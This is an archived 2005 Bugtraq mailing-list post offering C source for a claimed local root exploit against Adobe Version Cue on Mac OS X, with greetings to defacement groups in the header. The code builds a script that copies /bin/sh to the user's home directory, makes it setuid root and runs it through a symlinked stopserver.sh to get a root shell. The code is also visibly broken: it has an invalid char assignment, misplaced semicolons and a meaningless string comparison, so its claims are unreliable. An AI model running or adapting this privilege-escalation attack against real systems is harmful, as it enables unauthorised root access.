lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050516180915.6634.qmail@www.securityfocus.com>
Date: 16 May 2005 18:09:15 -0000
From: ali reza AcTiOnSpIdEr <actionspider@...il.com>
To: bugtraq@...urityfocus.com
Subject: Mac OS X - Adobe Version Cue local root exploit  [c version exploit]




/************************************************************************************************\
 [ Mac OS X - Adobe Version Cue local root exploit ]                                           
                    c version exploit                                                    
                --=== by ActionSpider ===--                                       
                     Iam sun-os hehehe                                          			                 ActionSpider@...uxmail.org                                       

[http://www.Ashiyane.com] 
[http://www.Ashiyane.net]                                        
[http://defacers.com.mx ]		                                 
           			                                                                         
*************************************************************************************************|                                                                                              
Greetz to: [ Behrooz & Nima  &  Ehsan & str0ke & Status-x  & Mafia_Boy  &  stealh  ]           
&&                                                                                               
Greetz to: [  and all member of SegmentationFault Group                                          
                                                                                                 Code written By ActionSpider Mac OS X - Adobe Version [C] version Exploit;)                                                                        
\************************************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>


int main(){
int x =1;
char a= "root";


printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n");
printf("\t\t--==Code written By ActionSpider==--\n");
printf("\t\t --=ActionSpider@...uxmail.org=--\n");
printf("\t\t\t[ www.Ashiayne.com ]\n\n\n");


printf("w8 for geting root man...\n");
for (x=1;x<=75;x++){
	printf("#");}
					 


printf("\nyour id now:");
system("id");
printf("touch productname.sh...");
system("echo cp /bin/sh /Users/$USER; >> productname.sh");
system("echo chmod 4755 /Users/$USER/sh; >> productname.sh");
system("echo chown root /Users/$USER/sh >> productname.sh");
printf("chmod productname.sh 0755");
system("chmod 0755 ./productname.sh");
printf("ok w8 for touch link...");
system("ln -s $path/stopserver.sh");
printf("exection it :p hehe\n");
system("./stopserver.sh");
system("./sh");
printf("ok w8 for see system rooted or not \n\n");


system("id");
       if (system("whoami") == a)
printf("\n\n ok system now rooted hehe...:P");
       else 
printf("sory this server is patch :(\n");
						
}






           
	
	


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ